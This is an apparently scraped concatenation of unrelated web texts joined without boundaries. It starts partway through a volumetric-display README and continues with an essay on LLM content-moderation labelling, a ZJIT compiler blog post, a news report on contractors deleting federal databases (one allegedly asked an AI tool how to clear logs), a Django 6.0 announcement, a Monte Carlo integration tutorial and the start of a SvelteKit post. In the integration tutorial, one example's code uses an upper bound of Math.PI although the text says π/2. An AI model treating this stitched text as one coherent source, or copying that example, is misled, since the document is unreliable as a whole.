| Key | Effect |
|---|---|
| esc | Exit |
| b | Bit depth - cycles through 1, 2 or 3 bits per channel. Higher bit depths result in lower refresh rates |
| u | Uniformity - cycles through different strategies for trading off brightness against uniformity |
| t | Trails - adjusts how far back to accumulate skipped voxels when the rotation rate is too high for the refresh rate |
| l | Lock - whether to adjust the rotation sync to keep it facing one way |
| d D | Drift - rotisserie mode. Introduces some explicit drift to the rotation sync |
| p | Panel - selectively disable the panels |
| xyz | Axis - When the display isn't spinning, it shows an othographic view. This lets you choose the axis |
While that's running, try one of the toys:
The
viewer
takes a list of
.obj
and
.png
files as arguments. You can scale, rotate and so on using the gamepad, and it
also accepts keyboard input when run remotely from the command line.
./viewer ~/Multivox/models/*.obj
| Control | Key | Effect |
|---|---|---|
| esc | Exit | |
| LB/RB | [ / ] | Cycle through models |
| A | Walkthrough / Orbit | |
| X | Zoom to fit | |
| Y | Toggle wireframe |
If you don't have a physical volumetric display, there's a simulator,
virtex
, which you can run in place of
vortex
. It exposes the same voxel buffer in shared memory, but renders the contents using OpenGL in an X11 window.
Run without command line arguments it creates a display compatible with the currently configured gadget, but there are some options to let you experiment with different geometries:
| Option | Effect |
|---|---|
| -s X | slice count - the number of vertical slices per revolution |
| -o X X | offsets - distance the front and back screens are offset from the axis, as a fraction of screen radius |
| -b X | bits per channel (1 - 3) |
| -w X Y | panel resolution |
| -g X | scan geometry - radial or linear. Linear looks better, but it's a lot harder to build. |
An idealised device with linear scanning and 3 bits per channel can be invoked like this:
./virtex -g l -s 128 -w 1280 1280 -b 3
The simulator is fill rate intensive; if you're running it on a Raspberry Pi you'll probably want to reduce the slice count.
If you want it to start up automatically on boot, you can install
vortex
as a service, and set
multivox
to run on startup.
First install everything to its default location
~/Multivox
:
make install
This will build the executable files and copy them into the destination directory, as well as creating
.mct
files in
~/Multivox/carts
for the built in toys.
Create the driver service:
sudo nano /usr/lib/systemd/system/vortex.service
and fill in the following information:
[Unit]
Description=Vortex Display Driver
After=multi-user.target
[Service]
ExecStart=/home/pi/Multivox/bin/vortex
[Install]
WantedBy=multi-user.target
Then start it up:
sudo systemctl daemon-reload
sudo systemctl enable vortex.service
The driver assigns itself to core 3 - you can add
isolcpus=3
to the end of
/boot/cmdline.txt
to ensure it's the only thing running on that core.
You'll also want the launcher to start up on boot:
And add the line:
@reboot /home/pi/Multivox/bin/multivox
If everything goes smoothly, when you turn on the device it will boot up into
Multivox
. This is a fantasy console which
acts as a launcher for all the games and demos you run on the hardware. The bundled toys are automatically installed in
the
~/Multivox/carts/
directory as
.mct
files, and external apps can be launched by adding a
.mct
file containing
its command, path and arguments.
Each
.mct
file appears as a cartridge in the Multivox front end. They should each have a label on the side; at the moment
all you can do to distinguish between them is change their colour in the
.mct
.
When you exit an app back to the launcher, it saves a snapshot of the voxel volume, and this gives a preview of what you'll see when you launch a cart. This means there are two competing representations of the same information, and any future work on the front end will probably start with overhauling the entire approach.
Some basic UI for controls such as changing bit depth, rebooting and so on would also be a boon.
| Control | Effect |
|---|---|
| LB/RB | Cycle through carts |
| A | Launch cart |
| ⧉ | Exit / resume running cart |
| △ ▽ | Change bit depth |
| ☰ x5 | Power off |
You are a machine learning engineer at Facebook in Menlo Park. Your task: build the best butt classification model, which decides if there is an exposed butt in an image.
The content policy team in D.C. has written country-specific censorship rules based on cultural tolerance for gluteal cleft—or butt crack, for the uninitiated.
A PM on your team writes data labeling guidelines for a business process outsourcing firm (BPO), and each example in your dataset is triple-reviewed by the firm's outsourced team to ensure consistency. You skim the labels, which seem reasonable.
import torch
import pandas as pd
from torch.utils.data import DataLoader, TensorDataset
from sklearn.model_selection import train_test_split
df = pd.read_csv("gluteal_cleft_labels.csv")
X = df.drop("label", axis=1).values
y = df["label"].values
x_train, x_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)
You decide to train a CNN: it'll be perfect for this edge detection task. Two months later, you've cracked it. Your model goes live, great success, 92% precision, 98% recall. You never once had to talk to the policy team in D.C.
Another email: Policy has heard about LLMs and thinks it's time to build a more "context-aware" model. They would like the model to understand whether there is sexually suggestive posing, sexual context, or artistic intent in the image.
You receive a 10 page policy doc. The PM cleans it up a bit and sends it to the BPO. The data is triple reviewed, you skim the labels, and they seem fine.
You make an LLM decision tree, one LLM call per policy section, and aggregate the results. Two months pass. You are stuck at 85% precision and recall, no matter how much prompt engineering and model tuning you do. You try going back to a CNN, training it on the labels. It scores 83%.
Your data science spidey-sense tingles. Something is wrong with the labels or the policy.
You email the policy team, sending them the dataset and results.
The East Coast Metamates say they looked at 20 of the labels. 60% were good, 20% were wrong, 20% were edge cases they hadn’t thought of.
The butt model lives to fight another day, or at least until these discrepancies get sorted out.
The butt model is still in production… What went wrong?
It doesn't matter if the task is content policy, sales chatbots, legal chatbots, or AI automation in any other industry.
Test Split: Any task complicated enough to require an LLM will need policy expert labels. [1] To detect nudity, outsourced labels will do, but to enforce a 10 page adult policy, you need the expert. Experts have little time: they can't give you enough labels to run your high scale training runs. You can't isolate enough data for a test set without killing your training set size. On top of that, a 10 page policy comes with so much gray area that you can’t debug test set mistakes without looking at test set results and model explanations.
Train Split: You no longer need a large, discrete training set because LLMs often don't need to be trained on data: they need to be given clear rules in natural language, and maybe 5-10 good examples. [2] Today, accuracy improvements come from an engineer better understanding the classification rules and better explaining them to the model, not from tuning hyperparameters or trying novel RL algorithms. Is a discrepancy between the LLM result and the ground truth due to the LLM’s mistake, the labeler’s mistake, or an ambiguous policy line? This requires unprecedented levels of communication between policy and engineering teams.
Recommending a New Split: Don’t train the LLM on any of the dataset. Address the inevitable biases with evaluation on blind, unlabeled data. [3] To understand why this is the best approach, we need to dive deeper into why the train-test split paradigm doesn't suffice.
Policy Experts write abstract rules. For older classification tasks, the rules had to be simple, because simple was all that models could do. Are there guns in the image? Is there a minor in the image? Complicated tasks are harder to pin down.
Take these examples. Sexually suggestive? Artistic expression? Sufficient censorship?
Source: Lorde's album covers from Vice.com, where you can find discussion of what is visible or not in each photo.
Most policy documents are not well-kept. A content policy is typically simplified, operationalized, and sent to outsourced teams to enforce. Edge cases and discrepancies found in India never make it back to policy teams in DC, so abstract rules are rarely pinned down.
In production, we see 15-20% false positive rates on BPOs. Half are attributable to human error, half to policy gray area.
To resolve edge cases, labeling tasks require an expert's time. BPO agents can eyeball how much butt is visible, but struggle with what is "sexually suggestive." BPOs are low-wage workers in countries like India or the Phillipines, and may have different definitions of "sexual context" than the policy writers intended. The costs of training them are often prohibitive at scale.
Using in-house agents is not sufficient for training data, either, as small alignment issues in the dataset cause large issues in production: If internal agents are 95% accurate (pretty good), the ceiling for the LLM's performance is 95%. If the LLM gets 95% of those labels right, its accuracy will be 90%.
Hard classification tasks have high rates of expert disagreement. Ask two people if there's a gun in an image, odds are they'll agree. Ask two policy experts whether a pose is sexually suggestive per their definition, you will start a one hour debate. If two experts only agree 95% of the time, then hand off to internal agents for labeling at 95% accuracy, then the LLM is 95% accurate, you are down to 86% LLM accuracy.
Language models see details in data that even experts miss. LLMs read every word of the product description. They scrutinize every image for a single pixel of gluteal cleft. They see gluteal cleft through sheer clothing, in low opacity, and in the bottom left corner of the back of a t-shirt. Even if experts have reviewed the data, there must be a re-review and feedback loop to check what the LLM has flagged.
Since labels are often wrong or ambiguous, you cannot keep the test set blind. If the LLM is right and the labels are wrong, either because the expert missed something, the policy was ambiguous, or the outsourced labeler was wrong, you have to look at the test set results to check. Moreover, you need to review the LLM's explanation while reviewing the new data to see what it found, confounding any true "blind" test. [4]
In production, we see anywhere from 15-30% error rates in data considered "golden sets" by operations teams.
Given the need for expert input and policy clarifications, you cannot maintain large enough training sets to keep the test set blind. For a simple policy, maintaining good labeled data is straightforward. However, attempting to integrate an LLM is often the first time a policy expert will be asked to scrutinize their rules and labels. Their time is valuable, and they will not be able to bring their expertise to a large dataset.
Complicated policies change, especially under scrutiny, and re-labeling affected examples is time-consuming. A leaner training set will be more valuable than a larger one in the long run.
Since these classification tasks are so complex, you can only "debug" the model by looking at the input and its explanations side-by-side. A policy might have dozens of rules and thousands of possible inputs, creating a fat-tail of model mistakes. Unlike traditional machine learning, where you fix mistakes by changing the design or hyperparameters of your model, you fix LLM mistakes by changing the prompt. You can directly fix a mistake (e.g. by telling the model "do not consider spreading legs fully clothed to be sexually suggestive"), so keeping mistakes hidden only hurts accuracy. [5]
You still need to run blind tests: QA the models on new data. Organizations end up running their models in "shadow mode" on production data, creating test examples without taking real-world actions. Here, you'll likely need an in-house agent to review the examples, then forward edge cases to a policy expert.
The Policy and Engineering Teams Need to be in Direct, Frequent Communication. The SF-DC split doesn't work anymore. Resolving edge cases and, in many cases, changing the policy to reflect patterns identified in the data requires collaboration.
Experts have historically not needed to look at the data—seen as a low-status task—but it is the only way to achieve high accuracy. This is an unsolved problem in many large organizations that blocks LLM integrations.
Most importantly, LLMs do not "train" on data the way traditional classifiers do, so there is often no need to have a "training" set, either. LLMs can enforce complicated, natural language rules because they can take natural language inputs, not because they can learn patterns from thousands of training examples. LLM accuracy is often a prompting task, not a design-your-RL-pipeline task. [1]
If you want a model to classify whether animals are endangered species, don't give it 1,000 examples of elephant ivory, 100 examples of every species on the CITES list, and 1,000 pictures of your non-endangered dog, give it the list of species names as inputs.
The "training" step for language models has to be policy alignment, not heating up GPUs. Since the data will always be flawed and the test set won't be blind, the machine learning engineer's priority should be spent working with policy teams to improve the data. That means surfacing edge cases and policy gray areas, clarifying policy definitions, and leveraging LLM outputs to find more discrepancies until data is high-quality and policy is clear.
In production, this is an ongoing process, as LLMs will always surface new interesting cases and policies will continue to change. Policies and enforcement are better for this feedback loop: it enables consistent, scaled enforcement platform-wide.
This is a paradigm shift that many machine learning teams, and enterprises as a whole, have not yet embraced. It requires a complete change in how we approach classification tasks.
If this is the road to automation, is it even worthwhile? The process described above, while arduous, is the shortest route to consistent policy enforcement to date. Before LLMs, running a successful quality assurance program would be prohibitively expensive. Retraining human agents takes far longer than retraining LLMs. Policy experts have historically never been owners in quality assurance processes, but now can be.
To save a little time, an in-house human agent might do a first review of the results, then a policy expert can review only the discrepancies. We find this tradeoff works well in production.
What are the implications for leveraging LLMs for tasks which do not have binary classifications ? Can an LLM be a lawyer if this much work is required to align, evaluate, and test models? Will an LLM ever ~know what you mean~ and skip all these alignment steps?
One core problem with the LLM architecture is that the model doesn't know when it is wrong. Model improvements over the past few years mean the LLM is right more often, but when it is wrong, it doesn't have an outlet.
This is a perennial machine learning problem: a model does not know what is "out of distribution" for itself.
Until that problem is solved, there will have to be an engineer in the loop improving and testing the model, and a policy expert evaluating the results. You can do this for complicated tasks like writing a patent application, but you have to be rigorous, define a rubric, curate expert data, and regularly evaluate model outputs. Calculating accuracy of each "training run" will never be as easy as checking if model_output == ground_truth, and will require a human in the loop. These complex tasks are far more lucrative than binary classification, and smart people are working on them.
Not everybody will take this rigorous approach, and as models improve, they might not have to. Until then, the highest leverage way to spend your time in 2026 will be looking closely at your data, cleaning your data, and labeling your data.
A For-You page for writing Explore the best essays and blogs on the Internet with Browser Buddy.
ZJIT adds support for Iongraph, which offers a web-based, pass-by-pass viewer with a stable layout, better navigation, and quality-of-life features like labeled backedges and clickable operands.
I’m an intern on the ZJIT team for the fall term. I also have a rather bad habit of being chronically on lobste.rs .
While idly browsing, I spotted an article by Ben Visness titled Who needs Graphviz when you can build it yourself? , which covers his work on creating a novel graph viewer called Iongraph .
Immediately, I was intrigued. I like looking at new technology and I wondered what it might be like to integrate the work done in Iongraph with ZJIT, getting all sorts of novel and interesting features for free. I suspected that it could also help other engineers to reason about how their optimizations might affect the control flow graph of a given function.
Also, it just looks really cool. It’s got nice colours, good built-in CSS, and is built in a fairly extensible way. The underlying code isn’t hard to read if you need to make changes to it.
Iongraph is compelling for a few reasons.
It supports stable layouts, which means that removing or adding nodes (something that can happen when you run an optimization pass) doesn’t shift the location of other nodes to an extreme degree. Iongraph also gives all sorts of interactive options, like clickable operands, scrollable graphs, or arrow keys to navigate between different nodes.
An especially useful feature is the ability to switch between different compiled methods with a small selector. In our codebase, ZJIT compiles each method on its own, so using a tool like this allows us to inspect method level optimizations all in one pane of a web browser. Of course, there are other great features, like loop header highlighting or being able to click on optimization passes to see what the control flow graph looks like after they’re applied.
Roughly an hour after I read through said article, I noticed that my mentor, Max , had also posted it in an internal team chat, mentioning that it would be cool to support it.
Of course, I was tempted by this project. As is a common trait for interns, I was tempted to take on a new, shiny project despite not knowing what it might imply to actually develop it. After talking to Max further, he clarified that this would require significant infrastructure work — or at the very least, more than initially apparent.
Looking into the Iongraph format, I figured that I would have to use some sort
of JSON crate. Since ZJIT as a project doesn’t rely strictly on using Rust
tooling like
cargo
, directly adding
serde_json
as a dependency was out of
the question. Another compelling option was vendoring it (or a smaller JSON
library), but that was likely to include features that we did not want or
introduce licensing issues.
After a quick discussion, I settled on implementing the functionality myself. I read a bit of the JSON specification, and got a sense of the ideal way to design the library’s API. Ultimately, I chose to opt for readability and usability over raw performance. This decision I think is reasonable given that the serialization code is not in the critical path of the compiler. It’s also accurate to say that the interface is clean enough to replace the internals in the future with minimal issue should there be more performance needed.
In designing the serializer, I chose to target
RFC 8259
, which provides more
freedom than previous specifications. As noted in said RFC, historical
specifications constrained the top level value to be an array or an object, but
this spec (and my implementation) don’t require that constraint. I also opted to
avoid comments, encode strictly in UTF-8, and escape control characters.
Notably, RFC 8259 does not impose a limit on precision of numbers, just that
infinity, negative infinity, or
NaN
are restricted.
With JSON serialization handled, the more challenging work was computing the graph metadata that Iongraph requires. The format expects explicit successor and predecessor relationships, loop headers, and back edge sources — information that ZJIT doesn’t normally compute since it’s not needed for compilation at this stage of compiler development.
One constraint I had to contend with was that the Iongraph format needs the user
to manually provide the successor and predecessor nodes for a given node in a
control flow graph. In ZJIT, we compile individual methods at a time as
Function
s (our internal representation) that hold a graph of
Block
s. Each
Block
is a basic block that you would find in a compiler textbook. (One caveat
to understand is that we use extended basic blocks, meaning that blocks can have
jump instructions at any point in their contained instructions — not just at
the end.)
The process of computing successors and predecessors is fairly simple. As you iterate through the list of blocks, all blocks referenced as the target of a jump-like instruction (whether conditional or unconditional) are added to the successor set. Then for each successor, update their predecessor set to include the block currently being operated on.
The next task I had to solve was computing the loop headers and back edge sources.
Required in the process of computing both of these are computing the dominators for blocks in a control flow graph. We can state that a block i dominates a block j if all paths in the control flow graph that reach j must go through i . Several algorithms exist for computing dominators. There exist both simple iterative options and more complicated versions. Initially, I heard of a fixed point iteration option that was very straightforward to implement but perhaps not the most efficient. That one (which I will discuss shortly) runs in quadratic time to the number of blocks available. In A Simple, Fast Dominance Algorithm by Cooper, Harvey, and Kennedy, both this iterative solution as well as one that is optimized to use less space are mentioned. A third option is the Lengauer-Tarjan algorithm, which has better worst case bounds compared to both the iterative and tuned implementations.
Based on the goals of the project, I opted to use the iterative algorithm, since it performs well and doesn’t incur serious memory use penalties for a small number of blocks in a control flow graph. It can be described as such:
dom = {}
nodes.each do |node|
if entry_nodes.include?(node)
dom[node] = Set[node]
else
dom[node] = nodes.to_set
end
end
changed = true
while changed
changed = false
nodes.reverse_post_order.each do |node|
preds = predecessors(node)
pred_doms = preds.map { |p| dom[p] }
# Intersection of all predecessor dominators
intersection = if pred_doms.empty?
Set.new
else
pred_doms.reduce(:&)
end
# Union with {node}
new_set = intersection | Set[node]
if new_set != dom[node]
dom[node] = new_set
changed = true
end
end
end
Implementing this is fairly simple, and it runs quickly enough for the limited number of nodes that it is totally acceptable.
To compute successors we use the following snippet:
let successors: BTreeSet<BlockId> = block
.insns
.iter()
.map(|&insn_id| uf.find_const(insn_id))
.filter_map(|insn_id| {
Self::extract_jump_target(&function.insns[insn_id.0])
})
.collect();
Here we go through all the instructions in a given block. We use a union find
data structure to map instructions to their canonical representatives (since
some optimizations may have merged or aliased instructions). We then filter by
extract_jump_target
, which returns an
Option
that contains a
BlockId
for
jump-like instructions.
After finding successors, we can set the predecessors by iterating through the nodes in the successor set and adding the current node to their predecessor sets.
The last important thing we need to consider is finding the loop depth.
For finding this, we need to consider first how we can find a natural loop in the first place.
We identify natural loops by detecting back edges. A back edge occurs when a block has a predecessor that is dominated by that block (all paths to the predecessor pass through this block). When we find such an edge, the target block is a loop header and the predecessor is the source of a back edge. The natural loop consists of all blocks on paths from the back edge source to the loop header (excluding the header itself). Each block within this natural loop then has its loop depth incremented.
These additional computations are used within the Iongraph layout engine to determine the height at which a given block should be vertically, or where lines should be routed within the graph. Loop headers and back edge sources are also marked!
You can click around this demo graph showing a simple example from ZJIT to get a sense of how Iongraph works! Operands are clickable to get to their definition. You can click on the phases of optimization on the left side - note that only the non-grayed out passes will have made changes. The graph is also zoomable and scrollable!
Hopefully this post was educational! I learned a lot implementing this feature and enjoyed doing so.
If you would like to do some work on ZJIT (and learn a lot in the process), you
are welcome to make pull requests to
github.com/ruby/ruby/
with the commit prefix
ZJIT:
. You can find issues
here
.
Also, feel free to join our Zulip !
U.S. prosecutors have charged two Virginia brothers arrested on Wednesday with allegedly conspiring to steal sensitive information and destroy government databases after being fired from their jobs as federal contractors.
Twin brothers Muneeb and Sohaib Akhter, both 34, were also sentenced to several years in prison in June 2015, after pleading guilty to accessing U.S. State Department systems without authorization and stealing personal information belonging to dozens of co-workers and a federal law enforcement agent who was investigating their crimes.
Muneeb Akhter also hacked a private data aggregation company in November 2013 and the website of a cosmetics company in March 2014.
After serving their sentences, they were rehired as government contractors and were indicted again last month on charges of computer fraud, destruction of records, aggravated identity theft, and theft of government information.
"Following the termination of their employment, the brothers allegedly sought to harm the company and its U.S. government customers by accessing computers without authorization, issuing commands to prevent others from modifying the databases before deletion, deleting databases, stealing information, and destroying evidence of their unlawful activities," the Justice Department said in a Wednesday press release .
According to court documents , Muneeb Akhter deleted roughly 96 databases containing U.S. government information in February 2025, including Freedom of Information Act records and sensitive investigative documents from multiple federal agencies.
One minute after deleting a Department of Homeland Security database, Muneeb Akhter also allegedly asked an artificial intelligence tool for instructions on clearing system logs after deleting a database.
The two defendants also allegedly ran commands to prevent others from modifying the targeted databases before deletion, and destroyed evidence of their activities. The prosecutors added that both men wiped company laptops before returning them to the contractor and discussed cleaning out their house in anticipation of a law enforcement search.
The complaint also claims that Muneeb Akhter stole IRS information from a virtual machine, including federal tax data and identifying information for at least 450 individuals, and stole Equal Employment Opportunity Commission information after being fired by the government contractor.
Muneeb Akhter has been charged with conspiracy to commit computer fraud and destroy records, two counts of computer fraud, theft of U.S. government records, and two counts of aggravated identity theft. If found guilty, he faces a minimum of two years in prison for each aggravated identity theft count, with a maximum of 45 years on other charges.
His brother, Sohaib, is charged with conspiracy to commit computer fraud and password trafficking, facing a maximum penalty of six years if convicted.
"These defendants abused their positions as federal contractors to attack government databases and steal sensitive government information. Their actions jeopardized the security of government systems and disrupted agencies' ability to serve the American people," added Acting Assistant Attorney General Matthew R. Galeotti of the DOJ's Criminal Division.
Broken IAM isn't just an IT problem - the impact ripples across your whole business.
This practical guide covers why traditional IAM practices fail to keep up with modern demands, examples of what "good" IAM looks like, and a simple checklist for building a scalable strategy.
The Django team is happy to announce the release of Django 6.0.
The release notes assembles a mosaic of modern tools and thoughtful design. A few highlights are:
You can get Django 6.0 from our downloads page or from the Python Package Index .
The PGP key ID used for this release is Natalia Bidart: 2EE82A8D9470983E
With the release of Django 6.0, Django 5.2 has reached the end of mainstream support. The final minor bug fix release, 5.2.9 , was issued yesterday. Django 5.2 will receive security and data loss fixes until April 2028. All users are encouraged to upgrade before then to continue receiving fixes for security issues.
Django 5.1 has reached the end of extended support. The final security release, 5.1.15 , was issued on Dec. 2, 2025. All Django 5.1 users are encouraged to upgrade to a supported Django version.
See the downloads page for a table of supported versions and the future release schedule.
I read Burghelea’s article on the Feynman trick for integration . Well, I’m not good enough at analysis to follow along, but I tried reading it anyway because it’s fascinating.
For people who do not have experience with analysis, integration is counting the total size of very many, very small piles of things. Analytical integration, i.e. the process by which we can get an exact result, can be very difficult. It often takes knowledge of special tricks, strong pattern recognition, and plenty of trial and error. Fortunately, in all cases in my career when I’ve needed the value of an integral, an approximate answer has been good enough.
In practical terms, this means we could spend a lot of time learning integration tricks, practice using them, and then take half an hour out of our day to apply them to an integral in front of us … or, hear me out, or , we could write four lines of JavaScript that arrive at a relatively accurate answer in less than a second.
If integration is summing many small piles, we have to figure out how big the piles are. Their height is usually given by a mathematical function, and our first example will be the same as in the Feynman trick article.
\[f(x) = \frac{x - 1}{\ln{x}}\]
This is to be integrated from zero to one, i.e. we want to know the size of the shaded area in the plot below. You can think of each column of shaded pixels as one pile, and we sum the size of all of them to get the total area. 1 Of course, this is an svg image so there are no columns of pixels. Alternatively, the more we zoom in, the thinner the columns become – but the more of them there are. This is why we need integration: it’s dealing with the limit case of infinitely many, infinitely thin columns.
We could imagine drawing six random numbers between zero and one, and plotting piles of the corresponding height at those locations. Since there are six piles, their width is one sixth of the width of the area we are integrating.
Even though some of these piles overlap by chance, and even though there are some random gaps between them, the sum of their areas (0.66) comes very close to the actual shaded area determined analytically (0.69). If we draw more piles, we have to make them correspondingly thinner, but the agreement between their sum and the total size of the area improves.
These are 100× as many piles, and they’re 1/100th as thick to compensate. Their total area is 0.70 – very close to 0.69. If we draw even more piles, we’ll get even closer.
This illustrates a neat correspondence between integrals and expected values. In the simple case, we can frame it mathematically as
\[\int_a^b f(x) \mathrm{d}x = E(f(x))\]
In words, this says that integrating the function \(f\) between \(a\) and \(b\) is the same as taking the expected value of \(f(x)\) at uniformly distributed random points between \(a\) and \(b\).
Here’s a JavaScript function that estimates the value of an integral in the most primitive way possible.
I = (B, lo, hi, f) => {
// Generate B random values uniformly between lo and hi.
let xs = Array.from({length: B}, _ => lo + (hi - lo) * Math.random());
// Compute the value of f at each location.
let ys = xs.map(f);
// Return the total area of each corresponding pile.
return (hi-lo)*ys.reduce((r, y) => r + y, 0)/ys.length;
}
To compute an approximation to the value of the integral we’ve seen, we run
I(10_000, 0, 1, x => (x-1)/Math.log(x) );
0.6916867623261724
This is fairly close to 0.69. And we got there in four lines of JavaScript, as promised.
We can try this on the next example too. Now we’re asking about the integral
\[\int_0^{\frac{\pi}{2}} \frac{\ln{(1 - \sin{x})}}{\sin{x}} \mathrm{d}x\]
which, translated to JavaScript, becomes
I(10_000, 0, Math.PI, x => Math.log(1 - Math.sin(x))/Math.sin(x) );
-3.67
This is again fairly close to the desired −3.7, but not quite there yet. The tricky shape of the function is the reason we aren’t getting as close as we want.
At the upper endpoint of the integration interval, this function goes to negative infinity. The random piles we draw come primarily from the well behaved region of the function, and thus don’t help the computer realise this behaviour.
There are clever ways to sample adaptively from the trickier parts of the function, but an easy solution is to just visually find a breakpoint, split the interval on that, and then estimate the sensible part separately from the crazy-looking part. Since the total area must be the sum of both areas, we can add their results together for a final estimation.
In this case, we might want to pick e.g. 1.5 as the breakpoint, so we combine the area estimations from 0–1.5 and then 1.5–\(\frac{\pi}{2}\). The result is
I(2_000, 0, 1.5, x => Math.log(1 - Math.sin(x))/Math.sin(x)) + I(8_000, 1.5, Math.PI/2, x => Math.log(1 - Math.sin(x))/Math.sin(x));
-3.70
which is indeed much closer to the actual value of −3.7.
Note that we aren’t taking more samples, we’re just sprinkling them more wisely over the number line. We spend 2,000 samples in the relatively well-behaved region where the function takes values from −1 to −6, and then we spend the other 8,000 samples in the small region that goes from −6 to negative infinity. Here it is graphically:
The reason this helps us is that this latter region contributes a lot to the value of the integral, but it is so small on the number line that we benefit from oversampling it compared to the other region. This is a form of sample unit engineering , which we have seen before in different contexts.
We can continue with some more examples from the Feynman trick article. That gets us the following table.
| Integral | Value | Estimation | Difference | Notes |
|---|---|---|---|---|
| \(\int_0^1 \frac{x-1}{\ln{x}} \mathrm{d}x\) | \(\ln{2}\) | 0.6943 | 0.2 % | |
| \(\int_0^{\frac{\pi}{2}} \frac{\ln{(1 - \sin{x})}}{\sin{x}} \mathrm{d}x\) | \(\frac{-3 \pi^2}{8}\) | -3.702 | < 0.1 % | |
| \(\int_0^1 \frac{\ln{(1 - x + x^2)}}{x - x^2} \mathrm{d}x\) | \(\frac{-\pi^2}{9}\) | -1.097 | < 0.1 % | |
| \(\int_0^{\frac{\pi}{2}} \frac{\arctan{(\sin{x})}}{\sin{x}} \mathrm{d}x\) | \(\frac{\pi}{2}\log{(1 + \sqrt{2})}\) | 1.385 | < 0.1 % | |
| \(\int_0^\infty x^2 e^{-\left(4x^2 + \frac{9}{x^2}\right)} \mathrm{d}x\) | \(\frac{13 \sqrt{\pi}}{32 e^{12}}\) | 0.000004414 | 0.2 % | (1) |
| \(\int_0^1 \frac{\ln{x}}{1 - x^2} \mathrm{d}x\) | \(\frac{-\pi^2}{8}\) | -1.227 | 0.5 % | (2) |
| \(\int_0^\infty \frac{e^{-x^2}}{1 + x^2} \mathrm{d}x\) | \(\frac{\pi e}{2}\mathrm{erfc}(1)\) | 0.6696 | 0.3 % | (3) |
Notes:
“Now,” the clever reader says, “this is all well and good when we have the actual value to compare to so we know the size of the error. What will we do if we’re evluating a brand new integral? What is the size of the error then, huh?”
This is why we sampled the function randomly. That means our approximation is a statistical average over samples, and for that we can compute the standard error of the mean. In the JavaScript implementation below, we use the quick variance computation , but we could perhaps more intuitively have used the spc inspired method .
Ic = (B, lo, hi, f) => {
let xs = Array.from(
{length: B}, _ =>
lo + (hi - lo) * Math.random()
);
let ys = xs.map(f);
// Compute the variance of the ys from the sum and
// the sum of squared ys.
let s = ys.reduce((r, y) => r + y, 0);
let ssq = ys.reduce((r, y) => r + y**2, 0);
let v = (ssq - s**2/B)/(B-1);
// Compute the mean and the standard error of the mean.
let m = (hi-lo)*s/B;
let se = (hi-lo)*Math.sqrt(v/B);
// Compute the 90 % confidence interval of the value of
// the integral.
return {
p05: m - 1.645*se,
p95: m + 1.645*se,
}
}
If we run this with the first integral as an example, we’ll learn that
Ic(10_000, 0, 1, x => (x-1)/Math.log(x) )
Object {
p05: 0.6896
p95: 0.6963
}
Not only is this range an illustration of the approximation error (small!), it is also very likely to capture the actual value of the integral. Here are some more examples from the same integrals as above:
| 5 % | 95 % | Actual | Contained? |
|---|---|---|---|
| 0.6904 | 0.6972 | 0.6931 | ✅ |
| -3.7673 | -3.6787 | -3.7011 | ✅ |
| -1.0975 | -1.0960 | -1.0966 | ✅ |
| 1.3832 | 1.3871 | 1.3845 | ✅ |
| 0.4372 | 0.4651 | 0.4424 | ✅ |
| -1.2545 | -1.2254 | -1.2337 | ✅ |
| 0.6619 | 0.6937 | 0.6716 | ✅ |
These are all built naïvely from 10,000 uniform samples. In other words, in none of the cases have the computation been split up to allocate samples more cleverly.
Again, we could spend a lot of time learning to integrate by hand … or we ask the computer for less than a second of its time first, and see if the accuracy it can do it with is appropriate for our use case. In my experience, it generally is.
What’s neat is we can still split up the computation like we did before, if we believe it will make the error smaller and the confidence interval narrower. Let’s use the following integral as an example.
\[\int_0^\infty \frac{\sin{x}}{x} \mathrm{d}x\]
This oscillates up and down quite a bit for small \(x\), and then decays but still provides significant contributions for larger \(x\). A naive evaluation would have a confidence interval of
Ic(10_000, 0, 100, x => Math.sin(x)/x)
Object {
p05: 1.461
p95: 1.884
}
and while this is certainly correct 2 The actual value of the integral is half \(\pi\) or approximatey 1.571. , we can do better. We’ll estimate the region of 0–6 separately from 6–100, using half the samples for each 3 Why put the break point at 6? The period of sin is a full turn, which is roughly 6 radians. This ensures we get roughly symmetric contributions from both integrals. That’s not necessary for the technique to work, but it makes the illustration a little cleaner. :
Ic(5_000, 0, 6, x => Math.sin(x)/x)
Object {
p05: 1.236
p95: 1.468
}
This contains the bulk of the value of the integral, it seems. Let’s see what remains in the rest of it.
Ic(5_000, 6, 100, x => Math.sin(x)/x)
Object {
p05: 0.080
p95: 0.198
}
We can work backwards to what the standard errors must have been to produce these confidence intervals. 4 The midpoint is the point estimation for each region, and the standard error is 1/1.645 times the distance between the 5 % point and the midpoint.
| Region | Value | Standard error |
|---|---|---|
| 0–6 | 1.4067 | 0.0372 |
| 6–100 | 0.1390 | 0.0359 |
The estimation of the total area would be the values summed, i.e. 1.5457. The estimation of the standard error of this we get through Pythagorean addition and it is approximately 0.05143. We convert it back to a confidence interval and compare with when we did not break it up into multiple components.
| Method | 5 % | 95 % | Range |
|---|---|---|---|
| Single operation (10,000 samples) | 1.461 | 1.884 | 0.423 |
| Two operations (5,000 samples × 2) | 1.461 | 1.630 | 0.169 |
Although in this case the two methods happen to share a lower bound, the upper bound has been dramatically reduced. The total range of the confidence interval is more than halved! This was because we allocated the samples more cleverly – concentrated them in the early parts of the function – rather than increased the number of samples.
That said, we’re at a computer, so we could try increasing the sample count. Or maybe both?
| Method | 5 % | 95 % | Range |
|---|---|---|---|
| Single operation (10,000 samples) | 1.461 | 1.884 | 0.423 |
| Two operations (5,000 samples × 2) | 1.461 | 1.630 | 0.169 |
| Single operation (100,000 samples) | 1.549 | 1.680 | 0.131 |
| Two operations (50,000 samples × 2) | 1.524 | 1.578 | 0.054 |
It seems like sampling more cleverly has almost the same effect as taking ten times as many samples.
We could play around with where to put the breakpoint, and how many samples to allocate to each side of it, and see which combination yields the lowest error. Then we can run that combination with a lot of samples to get the most accurate final result. That would take maybe 15 minutes of tooting about and exploring sensible-seeming alternatives, so it’s probably still quicker than integrating by hand.
It should be said that there are times when numeric solutions aren’t great. I hear that in electronics and quantum dynamics, there are sometimes integrals whose value is not a number, but a function, and knowing that function is important in order to know how the thing it’s modeling behaves in interactions with other things.
Those are not my domains, though. And when that’s not the case, the computer beats Feynman any day of the week.
I came across a pretty gnarly/fun bug in my Svelte project recently that had me scratching my head for a while and turned out to be a bug in SvelteKit itself, so I thought I’d write up the process I went through in finding, debugging, and fixing it.
Hopefully, someone will find this useful if they come across a similar issue (this includes me in 3 months time when I’ve forgotten all about this).
